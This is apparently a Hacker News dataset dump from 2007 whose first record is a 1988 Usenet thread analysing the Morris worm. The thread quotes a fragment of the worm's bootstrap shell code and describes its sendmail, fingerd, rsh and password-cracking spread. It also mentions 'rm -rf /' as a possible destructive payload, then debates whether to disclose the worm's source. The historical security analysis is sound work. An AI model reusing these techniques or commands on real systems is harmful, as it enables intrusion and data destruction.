-f sh ]thenP=x%delseP=shcc -o $P %s/bin/echo %s./$P -p $$ 5) This creates and dispatches the new worm.. This worm opens all theworm source files, then unlinks the files so they can't be found (sinceit has them open, however, it can still access the contents). Next,the worm steps through the hosts file (on the Sun, it uses YP to stepthrough the distributed hosts file) trying to connect to othermachines' sendmail. If a connection succeeds, it forks a child processto infect it, while the parent continues to attempt infection of othermachines.7) The child requests and initializes a new socket, then buildsand invokes a listener with the new socket number and hostid asarguments (#1, above).Other notes:The worm runs in stages. It first collects info from the /etc/hostsfiles, the hosts.equiv file, and other files containing host names andhost IP addresses. It even runs netstat to find out what networks themachine is attached to! It uses this information to attempt topenetrate sendmail on those machines. It also knows how to penetrate"fingerd" on Vaxen (on Suns, the attempt results in a core dump). Iwill privately tell individuals how to fix the bug in fingerd, but fornow change it so it does not run as "root".After this first stage, it appears to sleep for a while. Then it startscollecting user names and it begins probing with "rsh". I believe italso permutes either an internal list of words, or it uses the namesfrom passwd, but it also tries to see if it can break any of thepasswords for local accounts; if so, if forks a child to use telnetto break into that account and copy itself.It tries to copy itself to other systems using rsh, fingerd, andpossibly also uucp and/or ftp.As I write this, no one seems to know what it is supposed to eventuallydo. Perhaps it just breaks in everywhere it can. I wonder ifit isn't just going to wait until some compiled-in time and thenrun an "rm -rf /" or something similar (and awful). Has anyone noticednew files in /usr/spool/at or included in /usr/lib/crontab?Other notes:The program corrupts its argument vector, so it appears in a "ps ax"as "(sh)" (a login shell). Don't trust any of these if you havethem running.The program doesn't copy around source files (except the helper) --it copies around pre-compiled binaries that are linked on the localmachine and then run. The worm appears to only be carrying binariesfor 68020-based Suns and Vax 7xx machines. Pyramids, Sun 2's andSequents are all definitely immune.The strings in the binaries are encrypted against a random "strings"invocation. If you have a binary, Keith Bostic informs me that Xor with 0x81 will reveal interesting things, although that is notthe only mask used.The first observation of the virus I have heard about was 6pmWednesday night in Pittsburgh. It didn't hit Purdue until about4 this morning.I will update you with any further information I may find.If you forward whatever information you find, I will try tocollate it.--spafAcknowledgements: Some of the above information was obtained fromBrian Kantor (UCSD), Keith Bostic (UCB), Thomas Narten (Purdue),Dan Trinkle (Purdue), and Miek Rowan (Purdue). Thanks, guys.-- Gene SpaffordNSF/Purdue/U of Florida Software Engineering Research Center,Dept. of Computer Sciences, Purdue University, W. Lafayette IN 47907-2004Internet: [email protected] uucp: ...!{decwrl,gatech,ucbvax}!purdue!spafMatt Landauunread,Nov 3, 1988, 5:18:03 PM11/3/88to The virus also appears to try to compile things in /tmp or /usr/tmp.One thing you can do is move /bin/cc to some other name, and install a shell script in /bin/cc that checks to see if it's being invoked from within one of your temp directories. This will help catch the virus as it tries to infect a new system.Ben Feenunread,Nov 4, 1988, 4:23:22 PM11/4/88to Help m! I assume from the language this is written in that the virusonly affects UNIX. Correct?-- _ /| I can read your mind and you should be ashamed.\'o.O' Remember- Stoplights timed for 35 MPH are also timed for 75 MPH.=(___)= This .sig file stolen by: U [email protected] for use with uunet/usenetunread,Nov 5, 1988, 8:19:41 AM11/5/88to In article <[email protected]>, [email protected] (Ben Feen) writes:> > Help m! I assume from the language this is written in that the virus> only affects UNIX. Correct?The header says it all.Jonathan BayerIntelligent Software Products, Inc.Phil R. Karnunread,Nov 6, 1988, 1:07:34 PM11/6/88to Now that we have a pretty good idea who wrote the virus and what hisintentions were, I would like to suggest something he might do that would goa long way toward mitigating the damage he has done.It sure would be nice if Morris (or someone at Cornell with access to hisfiles) were to release the complete, original source for the object portionof the virus. There are a *lot* of uneasy people out here who are notcompletely sure that it is now completely understood, and releasing thesource ASAP would go a long way toward quelling those fears.I'm probably not the only one who has been "invited" to an internal meetingin my organization to answer questions about the virus and the steps takento protect against it. The more we administrators know about the virus whenwe go into those meetings, the easier our lives will be over the next fewdays and weeks.Phil KarnGene Spaffordunread,Nov 6, 1988, 10:29:05 PM11/6/88to In article <[email protected]> [email protected] (Phil R. Karn) writes:>It sure would be nice if Morris (or someone at Cornell with access to his>files) were to release the complete, original source for the object portion>of the virus. Good heavens, no! At least, it shouldn't be widely published! Thevirus, as is, needs only a few small changes and it could be sent outagain to infect all those systems that don't have all the necessarypatches in place. Plus, there are other "backdoors" (known and not yetknown) into systems that could be added in. The result could be a realmess if someone else decides to try a "better" version of the worm.(Note -- it's a worm, not a virus, since it can replicate itself anddoes not hide itself inside other code.)What we really want is a list of all the things in the worm that takeadvantage of security holes, and advice on how to plug them. I'mworking on getting a disassembled version of the virus so I can doexactly that, and I will post the list here and in various other placeswhen I have it. If someone at Cornell wants to aid me in this, fine,but I really, really think we should not publish the code in anyway....providing it to trusted individuals with a promise not to spreadit is fine (I wouldn't mind Phil getting a copy, for instance, or RickAdams, etc., but I wouldn't want others to get it...and I won't namenames, although 3 or 4 spring instantly to mind). We want to knowwhat holes to plug, not provide a power drill to vandals.Obnoxious Math Grad Studentunread,Nov 7, 1988, 3:40:43 AM11/7/88to In article <[email protected]>, spaf@cs (Gene Spafford) writes:>In article <[email protected]> [email protected] (Phil R. Karn) writes:>>It sure would be nice if Morris (or someone at Cornell with access to his>>files) were to release the complete, original source for the object portion>>of the virus.>Good heavens, no! At least, it shouldn't be widely published! The>virus, as is, needs only a few small changes and it could be sent out>again to infect all those systems that don't have all the necessary>patches in place. Plus, there are other "backdoors" (known and not yet>known) into systems that could be added in. The result could be a real>mess if someone else decides to try a "better" version of the worm.The result could *also* be a real mess if you all think the bad guys aregoing to be slowed down very much by keeping the code a "secret". Good thing we don't have to worry about security down here at UC BUGSFORBRAINS, since Gene and company are going to keep the key critical stuff hush hush for us. --famous last words, the unknown sysadminWhat was it that H P Lovecraft said about "fear"?So regarding the release of the code: ___ All in favor of once-a-month INTERNET random fire drills say AYE. ___ All in favor of once-a-lifetime INTERNET catastrophic debacles say NO.ucbvax!garnet!weemba Matthew P Wiener/Brahms Gang/Berkeley CA 94720Phil Karnunread,Nov 7, 1988, 6:34:31 AM11/7/88to Gene, I respectfully disagree. After I posted my note, I discovered that thephage mailing list has had a raging debate about precisely this point. Eventhough I wrote my original note because *I* wanted a copy of the virus/wormsource so I could be well-informed for my management's sake, I have to sidewith those calling for complete disclosure. The only issue in my mind is theexact timing of the public release.I make the following arguments for my position.1. Making the source available would help enormously in assuaging managementfears about additional, presently undetected damage the worm might havecaused (it might really have been a virus, for example). They are likely tobe uncomfortable having to trust and rely on the expertise of a fairly smallgroup of people they don't know. By no means am I casting aspersions onthose who have been cracking the virus; only trying to calm what may well beunfounded fears. Complete disclosure is the best antidote to paranoia.2. The worm source just isn't that much more dangerous than knowledge of thesecurity holes it used. Frankly, I'm surprised that Morris used it to builda worm. Two things are paramount to a system cracker: undetectability,followed closely by untraceability in case of detection. If I were a spywith knowledge of the sendmail hole, I would have cracked systems one byone, perhaps through a series of "cheesebox" systems to avoid being traced.Until now I haven't really thought much about the design of worms, but evenwithout the benefit of hindsight it seems fairly obvious to me thatcontrolling the exact rate of their spread (to avoid detection) is verydifficult. Why should I risk the possibility of a worm getting out of handjust to save me the trouble of cracking systems semi-manually?3. It is just not that hard to turn the worm's binary into something reallydestructive. It certainly does not *require* the source code to do so. Infact, it doesn't even require patching the .o file. Just link it with amodule that replaces _exit (or another suitably chosen system call executednear the end) with a function that first executes "rm -rf /", then loops.4. The source will get out anyway, in one form or another; this isinevitable. Lots of people have been decompiling it, and not all feel thatit should be kept secret. Perhaps I only have to wait for it to appear inthe New York Times... :-)5. Making the source code generally available is perhaps *the* best way toprod the vendors into fixing *lots* of holes in their systems, not just theones exploited by the worm.Face it, we all know how vendors behave -- everyone does the least workpossible, subject to the vocalness of their customers' demands. Severalpeople have already stated that they knew of the hole in sendmail for manyyears and they just chalked it up to the net being composed of benignpeople. Since it wasn't generally known (I didn't know about it, forexample) there was no general cry to fix it, and it lay open long enough forMorris to come along and exploit it.6. I found it ironic to read that the elder Morris recently submitted apaper on UNIX security for publication, but his employer squelched it. Whoknows what was in that paper? Perhaps, just perhaps, maybe it contained adescription of the hole in sendmail, among other things. Perhaps, justperhaps, Robert Jr., learned of this hole from his dad. Perhaps if thatpaper had been published, people would have taken steps to protectthemselves before the younger Morris had unleashed his worm.In sum: SECURITY THROUGH OBSCURITY JUST DOESN'T WORK!PhilKarl Kleinpasteunread,Nov 7, 1988, 1:15:30 PM11/7/88to [email protected] (Phil R. Karn) writes: It sure would be nice if Morris (or someone at Cornell with access to his files) were to release the complete, original source for the object portion of the virus.That may well constitute an invasion of privacy, depending on the lawsof the state of NY, not to mention Cornell University privacypolicies. And considering that such files might soon become evidencein what could become a bona fide criminal proceeding, don't bet on it.Impartial juries can be tough to find.--KarlMark Lawrenceunread,Nov 8, 1988, 5:55:48 AM11/8/88to I'm just waiting for the logical next step after the most recent ruckus.I can imagine a conversation among mucky-mucks higher up in the DoD, NSAand NSC: "What the hell are we doing permitting access to Military Networks by hacker college geeks? What do you mean that anybody in the world with a PC and a modem can send traffic across our networks? What the hell is this mail and net news garbage anyway?..." ad nauseum.Gad, it sets me ill-at-ease to have our net techno-existance foisted upbefore national media for close scrutiny and examination. The potentialfor misinformation and misinterpretation of events due to lack ofunderstanding of the technicalities are great. There are generals,admirals, congress-critters and beaurocrats who are now (maybeneedlessly) worried about the how this worm (none of the media reportsthat I've seen have corrected the ubiquitous use of the 'virus' term) or the next occurance might affect SAC, NORAD, the security system at Fort Knox or some other crucial computerized facility. Whether the danger to such such systems is real or not is immaterial to the policy-setters and the decision-makers. They will (do?) percieve vulnerability and (knee-jerk reaction) steps will be taken. I think that the probability is great that such (not well thought out or informed) actions could radically change the Net as we know it. Markpeter honeymanunread,Nov 8, 1988, 9:12:40 PM11/8/88to Mark Lawrence imagines a bunch of generals saying> "What the hell are we doing permitting access to Military Networks> by hacker college geeks? What do you mean that anybody in the world> with a PC and a modem can send traffic across our networks? What> the hell is this mail and net news garbage anyway?..." ad nauseum.ironically, internet access to milnet is already prevented, with theexcept of one application: mail.boom. peterRoy Smithunread,Nov 9, 1988, 8:25:41 AM11/9/88to [email protected] (Gene Spafford) writes:> (Note -- it's a worm, not a virus, since it can replicate itself and> does not hide itself inside other code.) Several people have mentioned that it's a worm and not a virus. Itried to explain this to my wife (who is a molecular biologist who workswith biolgical viruses) and she didn't like the term worm. She says thatthe distinction of not hiding inside other code is better described bycalling them lytic viruses and lysogenic viruses instead of worms andviruses. Anybody for electronic transposons?-- Roy Smith, System AdministratorPublic Health Research Institute{allegra,philabs,cmcl2,rutgers}!phri!roy -or- [email protected]"The connector is the network"Ken Olumunread,Nov 10, 1988, 9:44:45 AM11/10/88to In article <[email protected]> [email protected] (Roy Smith) writes:>[email protected] (Gene Spafford) writes:>> (Note -- it's a worm, not a virus, since it can replicate itself and>> does not hide itself inside other code.)>> Several people have mentioned that it's a worm and not a virus. I>tried to explain this to my wife (who is a molecular biologist who works>with biolgical viruses) and she didn't like the term worm. She says that>the distinction of not hiding inside other code is better described by>calling them lytic viruses and lysogenic viruses instead of worms and>viruses. Anybody for electronic transposons?The terminology depends on the exact analogy that you make betweencomputers and living things. If you say that a machine is like acell, then this recent problem is indeed a virus, because it getsinside your host and uses the machinery of the host to reproduceitself and spread to other machines. If you say that a program islike a cell, and a machine is like a multicellular organism, then it'sa parasite instead. If you say a machine is just a fertile placewhere programs live, then the "virus' is just a random organism. Ifavor the first analogy, and I think the lytic/lysogenic terms aregood ones, but somehow I can't see them getting used much by the newsmedia. Ken OlumHans Buurmanunread,Nov 11, 1988, 10:50:07 AM11/11/88to In article <1617@edsel> [email protected] writes:>In article <[email protected]> [email protected] (Roy Smith) writes:>>[email protected] (Gene Spafford) writes:>>> (Note -- it's a worm, not a virus, since it can replicate itself and>>> does not hide itself inside other code.)>>(...) She says that>>the distinction of not hiding inside other code is better described by>>calling them lytic viruses and lysogenic viruses instead of worms and>>viruses. Anybody for electronic transposons?>(...) I>favor the first analogy, and I think the lytic/lysogenic terms are>good ones, but somehow I can't see them getting used much by the news>media.If you look at the reproduction rate, shouldn't this program be calleda rabbit ?:-) Hans-----------------------------------------------------------------------------Hans Buurman | [email protected] Recognition Group | mcvax!dutrun!duttnph!hansFaculty of Applied Physics | tel. 31 - (0) 15 - 78 46 94Delft University of Technology |the Netherlands |-----------------------------------------------------------------------------Disclaimer: any opinions expressed above are my own....Joseunread,Nov 11, 1988, 11:50:07 AM11/11/88to In article <[email protected]> [email protected] (Roy Smith) writes:>[email protected] (Gene Spafford) writes:>> (Note -- it's a worm, not a virus, since it can replicate itself and>> does not hide itself inside other code.)> Several people have mentioned that it's a worm and not a virus. I>tried to explain this to my wife (who is a molecular biologist who works>with biolgical viruses) and she didn't like the term worm. She says that ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Actually, IT IS very much like a parastic worm, which invadesa biological system, and uses the host as a domain for its own reproductionand activity. It can then travel from system to system (ie. person to personthrough certain types of contact). It doesn't actually change the geneticsof a person (ie. does not attatch itself to the code), but can harm the system by interupting normal processes.-----------------------------------------------------------------------------"Fighting for Truth, Kenneth C. Moyle Justice, and Department of Biochemistry anything else that McMaster University - Hamilton, Ontario seems fun at the time" kenm@maccs-----------------------------------------------------------------------------Brandon S. Allberyunread,Nov 14, 1988, 3:17:56 PM11/14/88to As quoted from <[email protected]> by [email protected] (Gene Spafford):+---------------| In article <[email protected]> [email protected] (Phil R. Karn) writes:| >It sure would be nice if Morris (or someone at Cornell with access to his| >files) were to release the complete, original source for the object portion| >of the virus. | | Good heavens, no! At least, it shouldn't be widely published! The| virus, as is, needs only a few small changes and it could be sent out| again to infect all those systems that don't have all the necessary| patches in place. Plus, there are other "backdoors" (known and not yet| known) into systems that could be added in. The result could be a real| mess if someone else decides to try a "better" version of the worm.+---------------G*d, yes! Anyone who disbelieves this should look up the history of the"nVIR" virus family on the Macintosh. And *that* started out as a PUBLISHEDEXAMPLE of a POTENTIAL security hole!!!++Brandon-- Brandon S. Allbery, comp.sources.misc moderator and one admin of ncoast PA UN*Xuunet!hal.cwru.edu!ncoast!allbery <PREFERRED!> [email protected][email protected] <ALSO> [email protected] is moving off ncoast -- please do NOT send submissions direct Send comp.sources.misc submissions to comp-sources-misc@<backbone>.Mike Klausunread,Nov 21, 1988, 5:21:58 PM11/21/88to In article <[email protected]>, [email protected] (Gene Spafford) writes:> (Note -- it's a worm, not a virus, since it can replicate itself and> does not hide itself inside other code.) OK, it's been established that it's a worm... ^^^^> > I'm working on getting a disassembled version of the virus so I can do... ^^^^^ Is this a freudian slip? Is there something else running around in the net(s)? Did someone say grafitti? mak Story: Once upon a time, there was a computer tournament between CIT and MIT involving a chess game. This was extremely tedious and boring until a couple of nerds started a new game with initial setup consisting exclusively of forks.....
2024-11-08T01:38:36
null
train
18,603
ereldon
2007-05-02T04:56:51
Does anyone use SUN's Startup Essentials? Just wondering.
null
http://www.sun.com/emrkt/startupessentials/
1
0
null
null
null
null
null
null
null
null
null
null
train
18,608
startupprincess
2007-05-02T05:32:43
Getting Busy? Consider a Virtual Assistant
null
http://startupprincess.com/wordpress/getting-busy-consider-a-virtual-assistant/
2
0
null
null
null
null
null
null
null
null
null
null
train
18,611
rms
2007-05-02T05:44:29
back up, delete me
null
http://www.digg.com
1
0
[ 18614 ]
null
true
null
null
null
null
null
null
null
train
18,612
mhidalgo
2007-05-02T05:44:31
Apparently Digg isn't the only one doing shady stuff...google is as well
null
http://taoetc.org/69
6
2
[ 18622, 19350 ]
null
null
null
null
null
null
null
null
null
train
18,618
nreme
2007-05-02T05:49:48
A Teen social network that has been growing organically released by Myspace
null
http://www.alexa.com/data/details/traffic_details?site0=www.teenwag.com&site1=&site2=&site3=&site4=&y=t&z=1&h=400&w=700&range=6m&size=Large&url=www.teenwag.com
1
-1
null
null
true
null
null
null
null
null
null
null
train
18,624
staunch
2007-05-02T06:21:27
SysAdmins of Well Known Web Sites Discuss Disk Monitoring For MogileFS
null
http://lists.danga.com/pipermail/mogilefs/2007-May/000899.html
1
0
null
null
null
null
null
null
null
null
null
null
train
18,631
rms
2007-05-02T06:43:46
Kevin Rose's response
null
http://blog.digg.com/?p=74?
8
0
null
null
null
null
null
null
null
null
null
null
train
18,638
purblind
2007-05-02T07:19:43
Sphere Redesigned to Focus on Connections Between News Stories
null
http://www.techcrunch.com/2007/05/01/new-sphere-focuses-on-connections-between-news-stories/
1
0
null
null
null
no_error
New Sphere Focuses On Connections Between News Stories | TechCrunch
2007-05-02T04:21:23+00:00
Michael Arrington
When blog search engine Sphere launched in May 2006, it included a unique feature that discovered, on the fly, stories related to what you were reading regardless of whether or not the two stories were hyperlinked. The feature, called “Sphere It,” has grown in popularity and has helped Sphere get itself embedded in top blogs and news sites. We include a Sphere It link at the bottom of each post, which pulls up a window where other blog stories that talk about related issues are shown. Time.com and other major news sites have done the same. Today, a substantial portion of Sphere’s total traffic comes from these partner sites using the feature to generate more content (and page views) for readers. Tonight Sphere relaunched their home page to reflect the usefulness of this feature. The main area of the site is broken down into four columns. On the left are major topics, like Top News, U.S. News, Entertainment, Sports, Technology, etc. Click on any topic and the second column populates with recent news items from Sphere partners (sites like ours, Time.com and others that include the Sphere It functionality) that has generated a lot of buzz, which is calculated based on page views for the item (against an average for the site) and other factors the company isn’t disclosing (but which probably include an anlysis of the extent to which other sites are writing about similar things). Click on any news item and it is pulled up in column three. In column four, related news items are shown. You can keep clicking on a topic infinitely. Click on a column four story – it moves left, and column four shows news items related to that story. Like TechMeme, the new Sphere site can become a place that people check frequently to see what news is breaking in the blogosphere and mainstream media, and see other content about that topic. It’s different than TechMeme in that Sphere doesn’t require links between articles. News sites that want to be included in Sphere It must add the feature to their sites. The Sphere home page has a link to do that. Sphere has raised just $4 million to date from True Ventures, Trident Capital and a number of angel investors. The company has eight employees. Most Popular Michael Arrington most recently Co-Founded CrunchFund after leading TechCrunch to a successful exit with AOL. His venture investments include Uber, Airbnb and Pinterest. Michael was the Editor of TechCrunch, which he founded in 2005. In 2008 Time Magazine named Michael “One of the World’s 100 most influential people”. Michael also practiced securities law at O’Melveny & Myers and Wilson Sonsini Goodrich & Rosati.Michael graduated from Stanford Law School and 
Claremont McKenna College. View Bio Newsletters Subscribe for the industry’s biggest tech news Related Latest in TC
2024-11-07T08:30:34
en
train
18,641
farmer
2007-05-02T07:30:22
Unanimous Supreme Court decision against trivial patents
null
http://unenumerated.blogspot.com/2007/04/patent-double-whammy-supreme-court.html
2
0
null
null
null
null
null
null
null
null
null
null
train
18,653
mattjaynes
2007-05-02T08:45:24
'Cool kids' of the tech world
null
http://www.crazyontap.com/topic.php?TopicId=18024&Posts=1
1
0
null
null
null
null
null
null
null
null
null
null
train
18,654
mattjaynes
2007-05-02T08:47:40
Great hand-drawn map of social network world
null
http://xkcd.com/c256.html
14
4
[ 18704, 18833 ]
null
null
null
null
null
null
null
null
null
train
18,656
macsucks
2007-05-02T09:28:54
Why do hackers buy Macbooks even though they really suck? So are they really hackers,even Sergey Brin uses a Windows XP pc...!
null
http://mac.teenwag.com/poll?n=1736
1
-1
null
null
true
null
null
null
null
null
null
null
train
18,657
macsucks
2007-05-02T09:29:54
Do you use Google or Live or Yahoo! What does it tell about your personality
null
http://mac.teenwag.com/poll?n=1742
1
-1
null
null
true
null
null
null
null
null
null
null
train
18,665
danielha
2007-05-02T10:52:00
HeardOnTV.com - Music from your favorite TV shows
null
http://www.profy.com/2007/05/02/heardontvcom-music-from-your-favorite-tv-shows/
1
0
null
null
null
http_404
404 Not Found
null
null
Server Error 404 Page Not Found This page either doesn't exist, or it moved somewhere else. That's what you can do Reload Page Back to Previous Page Home Page
2024-11-07T23:05:36
null
train
18,668
bootload
2007-05-02T11:36:13
Fallacies of Distributed Computing
null
http://en.wikipedia.org/wiki/Fallacies_of_Distributed_Computing
1
0
null
null
null
missing_parsing
Fallacies of distributed computing
2005-12-03T09:43:53Z
Contributors to Wikimedia projects
From Wikipedia, the free encyclopedia The fallacies of distributed computing are a set of assertions made by L Peter Deutsch and others at Sun Microsystems describing false assumptions that programmers new to distributed applications invariably make. The originally listed fallacies are[1] The network is reliable; Latency is zero; Bandwidth is infinite; The network is secure; Topology doesn't change; There is one administrator; Transport cost is zero; The network is homogeneous; The effects of the fallacies[edit] Software applications are written with little error-handling on networking errors. During a network outage, such applications may stall or infinitely wait for an answer packet, permanently consuming memory or other resources. When the failed network becomes available, those applications may also fail to retry any stalled operations or require a (manual) restart. Ignorance of network latency, and of the packet loss it can cause, induces application- and transport-layer developers to allow unbounded traffic, greatly increasing dropped packets and wasting bandwidth. Ignorance of bandwidth limits on the part of traffic senders can result in bottlenecks. Complacency regarding network security results in being blindsided by malicious users and programs that continually adapt to security measures. Changes in network topology can have effects on both bandwidth and latency issues, and therefore can have similar problems. Multiple administrators, as with subnets for rival companies, may institute conflicting policies of which senders of network traffic must be aware in order to complete their desired paths. The "hidden" costs of building and maintaining a network or subnet are non-negligible and must consequently be noted in budgets to avoid vast shortfalls. If a system assumes a homogeneous network, then it can lead to the same problems that result from the first three fallacies. The list of fallacies originated at Sun Microsystems. L. Peter Deutsch, one of the original Sun "Fellows", first created a list of seven fallacies in 1994; incorporating four fallacies Bill Joy and Dave Lyon had already identified in "The Fallacies of Networked Computing".[2] Around 1997, James Gosling, another Sun Fellow and the inventor of Java, added the eighth fallacy.[2] In an episode of "Software Engineering Radio" [3] Peter Deutsch added a ninth fallacy: "It's really an expansion of number 4. It extends beyond the boundaries of the physical network. ... The party you are communicating with is trustworthy." Later in 2020, Mark Richards and Neal Ford expanded upon the original "Fallacies of Distributed Computing" by introducing three additional fallacies to address contemporary challenges in distributed systems: [4] Versioning is simple Compensating updates always work Observability is optional CAP theorem PACELC theorem Distributed computing Fine vs coarse grained SOA ^ Wilson, Gareth (2015-02-06). "The Eight Fallacies of Distributed Computing - Tech Talk". Archived from the original on 2017-11-07. Retrieved 2017-06-18. The Eight Fallacies are something that I heard about at a Java One conference a long time ago by a guy named James Gosling. He attributed them to someone named Peter Deutsch and basically a bunch of guys at Sun had come up with a list of these fallacies. ^ a b Van Den Hoogen, Ingrid (2004-01-08). "Deutsch's Fallacies, 10 Years After". Archived from the original on 2007-08-11. Retrieved 2005-12-03. ^ L. Peter Deutsch on the Fallacies of Distributed Computing. 2021-07-27. Event occurs at 57:10. ^ Richards, Mark. Fundamentals of Software Architecture: An Engineering Approach. O'Reilly Media. ISBN 978-1492043454. Deutsch, Peter. "The Eight Fallacies of Distributed Computing". nighthacks.com. Retrieved 2024-07-24. Rotem-Gal-Oz, Arnon (January 2008). "Fallacies of Distributed Computing Explained". Retrieved 2024-07-24 – via ResearchGate.
2024-11-08T21:04:25
null
train
18,669
dpapathanasiou
2007-05-02T11:49:45
Invite to "Launch: Silicon Valley 2007"
null
2
6
[ 18670, 18814, 18693 ]
null
null
invalid_url
null
null
null
null
2024-11-08T16:37:59
null
train
18,674
sajid
2007-05-02T12:51:11
Why Did Friendster Fail?
null
http://www.nytimes.com/2006/10/15/business/yourmoney/15friend.html?ex=1318564800&en=3e9438ed349f7ce7&ei=5090&partner=rssuserland&emc=rss
7
9
[ 18699, 18696, 18676, 18812, 18890 ]
null
null
bot_blocked
nytimes.com
null
null
Please enable JS and disable any ad blocker
2024-11-08T07:50:05
null
train
18,679
gibsonf1
2007-05-02T13:12:59
YouTube Shocker: Chase Bank Records Found In Trash
null
http://wcbstv.com/topstories/local_story_121055435.html
3
1
[ 18695 ]
null
null
null
null
null
null
null
null
null
train
18,680
gibsonf1
2007-05-02T13:16:46
How the Internet took over
null
http://www.usatoday.com/tech/top25-internet.htm
1
0
null
null
null
null
null
null
null
null
null
null
train
18,681
gibsonf1
2007-05-02T13:21:15
Vista-Based PC Games Could Blow Consoles Out of Water
null
http://www.foxnews.com/story/0,2933,269017,00.html
1
0
null
null
null
null
null
null
null
null
null
null
train
18,682
gibsonf1
2007-05-02T13:23:36
Defense Department Working on High-Tech Lie Detectors
null
http://www.foxnews.com/story/0,2933,269076,00.html
1
0
null
null
null
null
null
null
null
null
null
null
train
18,683
gibsonf1
2007-05-02T13:25:49
MySpace Launches Beta Version of Chinese Edition
null
http://www.foxnews.com/story/0,2933,268982,00.html
1
0
null
null
null
null
null
null
null
null
null
null
train
18,684
jslogan
2007-05-02T13:29:31
Here's why the business relationship with consultants is upside down
null
http://www.jslogan.com/content/view/166/
2
0
null
null
null
null
null
null
null
null
null
null
train
18,686
gibsonf1
2007-05-02T13:30:00
YouTube adds Active Sharing feature to videos
null
http://www.webware.com/8301-1_109-9714008-2.html?tag=blog
1
0
null
null
null
null
null
null
null
null
null
null
train
18,689
gibsonf1
2007-05-02T13:31:34
Google re-branding personal home page, adding widget maker
null
http://www.webware.com/8301-1_109-9714279-2.html?tag=blog
2
0
null
null
null
fetch failed
null
null
null
null
2024-11-08T12:47:50
null
train
18,691
gibsonf1
2007-05-02T13:34:04
HP touts new mold for the chip industry
null
http://news.com.com/HP+touts+new+mold+for+the+chip+industry/2100-1008_3-6180595.html?tag=nefd.lede
1
0
null
null
null
null
null
null
null
null
null
null
train
18,706
immad
2007-05-02T14:19:54
Whats the best option for customised Web analytics? (Ruby on Rails or otherwise)
null
1
1
[ 18707 ]
null
null
invalid_url
null
null
null
null
2024-11-08T16:37:59
null
train
18,708
usablecontent
2007-05-02T14:25:11
FeedLounge Says Goodbye
null
http://startupmeme.com/2007/05/02/feedlounge-says-goodbye/
1
0
null
null
null
null
null
null
null
null
null
null
train
18,714
gibsonf1
2007-05-02T14:40:24
More than an open-source curiosity (Mono - .net on Linux?)
null
http://news.com.com/More+than+an+open-source+curiosity/2008-7344_3-5271084.html
1
0
null
null
null
null
null
null
null
null
null
null
train
18,730
usablecontent
2007-05-02T15:52:51
Anatomy of the Digg Crisis
null
http://startupmeme.com/2007/05/02/anatomy-of-the-digg-crisis/
3
4
[ 18736, 18733 ]
null
null
null
null
null
null
null
null
null
train
18,731
source
2007-05-02T15:55:14
FeedLounge shuts down
null
http://feedlounge.com/blog/2007/04/30/time-to-say-goodbye/
2
0
null
null
null
null
null
null
null
null
null
null
train
18,735
mattjaynes
2007-05-02T16:03:43
Employees: A Threat to Your Business?
null
http://www.michaeleagar.com/2007/05/02/employees-a-threat-to-your-business/
1
0
null
null
null
http_404
Page Not Found | Successful Courses & Student Success
null
null
No Results Found The page you requested could not be found. Try refining your search, or use the navigation above to locate the post.
2024-11-08T04:14:45
null
train
18,737
mattjaynes
2007-05-02T16:12:21
The Mid Life Entrepreneur Crisis
null
http://avc.blogs.com/a_vc/2007/05/the_mid_life_en.html
11
5
[ 18935, 18923, 19120, 18821, 19323 ]
null
null
null
null
null
null
null
null
null
train
18,738
fruscica
2007-05-02T16:14:24
Startup Comedy 101 (1m18s video, via Veoh.com)
null
http://www.veoh.com/videos/v446231eTRDQWZM
1
0
null
null
null
null
null
null
null
null
null
null
train
18,740
mattjaynes
2007-05-02T16:15:40
5 Ways to Avoid "Founderitis"
null
http://startupspark.com/5-ways-to-avoid-founderitis/
4
1
[ 18772 ]
null
null
null
null
null
null
null
null
null
train
18,742
dawie
2007-05-02T16:19:36
Joost Launching Today
null
http://startupmeme.com/2007/05/01/joost-launching-today/
2
2
[ 18804, 18799 ]
null
null
null
null
null
null
null
null
null
train
18,744
champion
2007-05-02T16:22:57
Burning Bridges: East Coast vs. West Coast
null
http://graysky.org/2007/05/burning-bridges/
1
0
null
null
null
null
null
null
null
null
null
null
train
18,749
andre
2007-05-02T16:40:49
Russian Exact Copy of Facebook
null
http://vkontakte.ru/
2
4
[ 18763, 18765, 18750 ]
null
null
null
null
null
null
null
null
null
train
18,753
mattjaynes
2007-05-02T16:46:50
3 Reasons Why Wanna-Be Entrepreneurs Never Start Their Own Businesses
null
http://blog.yeabiz.com/2007/05/02/3-reasons-why-wanna-be-entrepreneurs-never-start-their-own-businesses/
2
1
[ 18788 ]
null
null
null
null
null
null
null
null
null
train
18,754
mattjaynes
2007-05-02T16:49:55
How helpful are mentors?
null
http://scottgbradley.blogspot.com/2007/05/mentorsyou-cant-succeed-without-them.html
1
0
null
null
null
null
null
null
null
null
null
null
train
18,757
transburgh
2007-05-02T17:11:00
How to Test Whether or not to Take on a Partner
null
http://www.gobignetwork.com/wil/2007/5/2/how-to-test-whether-or-not-to-take-on-a-partner/10144/view.aspx
6
2
[ 18762 ]
null
null
fetch failed
null
null
null
null
2024-11-08T00:51:08
null
train
18,766
ACSparks
2007-05-02T17:34:29
The World According to 37signals (6 min video interview with Jason Fried)
null
http://www.businesspov.com/article/199
1
0
null
null
null
null
null
null
null
null
null
null
train
18,767
Readmore
2007-05-02T17:36:08
Joyent Slinghsot Released today
null
http://joyeur.com/2007/05/01/slingshot-public-release
2
0
null
null
null
null
null
null
null
null
null
null
train
18,768
msgbeepa
2007-05-02T17:36:12
Pligg released beta version 9.5
null
http://www.media-sight.net/2007/05/pligg-released-beta-version-95.html
1
-1
null
null
true
null
null
null
null
null
null
null
train
18,770
far33d
2007-05-02T17:36:40
A Greener Apple
null
http://www.apple.com/hotnews/agreenerapple/
2
1
[ 18891 ]
null
null
null
null
null
null
null
null
null
train
18,771
mattjaynes
2007-05-02T17:38:48
Software Startups: 7 Signs The Industry Is Doing Well
null
http://onstartups.com/home/tabid/3339/bid/1429/Software-Startups-7-Signs-The-Industry-Is-Doing-Well.aspx
3
0
null
null
null
null
null
null
null
null
null
null
train
18,773
Mistone
2007-05-02T17:42:25
Employer Waiver of IP Rights related to an employees new venture
null
1
1
[ 18775 ]
null
null
invalid_url
null
null
null
null
2024-11-08T16:37:59
null
train
18,778
usablecontent
2007-05-02T17:58:51
Windows Live Calendar Coming Soon, Yeah Sure
null
http://startupmeme.com/2007/05/02/windows-live-calendar-coming-soon-yeah-sure/
2
1
[ 18783 ]
null
null
null
null
null
null
null
null
null
train
18,780
mattjaynes
2007-05-02T18:01:25
